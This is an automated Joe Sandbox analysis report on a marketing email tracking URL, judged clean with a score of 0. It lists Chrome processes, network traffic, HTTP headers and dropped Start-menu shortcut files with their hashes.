Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0

Overview

General Information

Sample URL:http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0
Analysis ID:1540484
Infos:

Detection

Score:0
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6508 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6836 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1980,i,9027391736770792029,216551370925765132,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6672 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UXhVePttZLeKToH&MD=ab1o2xFG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UXhVePttZLeKToH&MD=ab1o2xFG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0 HTTP/1.1Host: click.email.traininng.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: click.email.traininng.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: click.email.traininng.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Wed, 23 Oct 2024 18:24:36 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 6
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: classification engineClassification label: clean0.win@17/10@6/5
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1980,i,9027391736770792029,216551370925765132,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1980,i,9027391736770792029,216551370925765132,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
click.virt.s11.exacttarget.com
13.111.71.11
truefalse
    unknown
    www.google.com
    142.250.186.36
    truefalse
      unknown
      click.email.traininng.com
      unknown
      unknownfalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://click.email.traininng.com/favicon.icofalse
          unknown
          http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0false
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            142.250.186.36
            www.google.comUnited States
            15169GOOGLEUSfalse
            239.255.255.250
            unknownReserved
            unknownunknownfalse
            216.58.212.132
            unknownUnited States
            15169GOOGLEUSfalse
            13.111.71.11
            click.virt.s11.exacttarget.comUnited States
            22606EXACT-7USfalse
            IP
            192.168.2.16
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1540484
            Start date and time:2024-10-23 20:24:01 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 3m 40s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsinteractivecookbook.jbs
            Sample URL:http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:13
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:CLEAN
            Classification:clean0.win@17/10@6/5
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 172.217.16.195, 64.233.167.84, 142.250.185.206, 34.104.35.123, 172.217.16.131, 142.250.185.110
            • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • VT rate limit hit for: http://click.email.traininng.com/open.aspx?ffcb10-fecb16747666037f-fe2e1572756d067b7d1673-fe301171716404787d1272-ff69107174-fe4115757565067d741474-ff051573756402&bmt=0
            No simulations
            No context
            No context
            No context
            No context
            No context
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 17:24:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
            Category:dropped
            Size (bytes):2673
            Entropy (8bit):3.9779892093983644
            Encrypted:false
            SSDEEP:48:8HKdesTTHAHy/OidAKZdA1FehwiZUklqehKlxy+3:8HRsferxy
            MD5:19CF9117D0063BDEC36BBC5B2C99888C
            SHA1:30BA6E657AD224664B7D017EA5E737AAB2FD72A0
            SHA-256:0D9618938EBE82B88DA64DDDCED7C4A01039A40E1F652E6FF3B4AB2A2BE791F9
            SHA-512:26E6562AE62A9C89A412182751B19D519F3F84D90C6641EFE68F885E1A0F29258B5A659C54F8BDA334728850D32BAA2FEB9E2DA18CCD6762380083C5DAC62C8F
            Malicious:false
            Reputation:low
            Preview:L..................F.@.. ...$+.,......g.x%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 23 17:24:35 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
            Category:dropped
            Size (bytes):2675
            Entropy (8bit):3.9912984174207344
            Encrypted:false
            SSDEEP:48:8WdesTTHAHy/OidAKZdA1seh/iZUkAQkqehZlxy+2:89sfY9Q4xy
            MD5:31772D99E2116DB7916E282DF6B2E02A
            SHA1:FDD86942CB4612A7C361BF5FF90427539F3BFCD4
            SHA-256:26F5AD117965A912B3BC6A5021FD8D67C8CC101288A56BCB4A39FBA4DAE8C8DA
            SHA-512:CAF041B8DAEBF2A0616703AB2160892BBA8D2293E01E54F709E275F5A001AD0A7043D537F37540BE54E1AF1DC86EB01A6B8E83B53F3E625CF1DF9B62C724C6B1
            Malicious:false
            Reputation:low
            Preview:L..................F.@.. ...$+.,....\2\.x%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IWY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VWY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VWY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VWY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VWY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
            Category:dropped
            Size (bytes):2689
            Entropy (8bit):4.005728306361498
            Encrypted:false
            SSDEEP:48:8ydesTTHAHy/OidAKZdA14meh7sFiZUkmgqeh7sPlxy+BX:8psfEnfxy
            MD5:81DBCF8EC2026F84B60CCCA4F7DE5163
            SHA1:AED1400FB6092175457DD9CAC0BE5714AE656133
            SHA-256:271FD60291DFD68DBC7E3C33F1FDD1742AB8774D8B4450BAC67E354AAA1E9252
            SHA-512:B97F2354B10EBB7A555941A097026A8D0891B74469B789EA136231BA33F9E2B945C469C4AE17C40D148489BF7132B52AA2E0E6D4C57D1197A0D29812B1044FCE
            Malicious:false
            Reputation:low
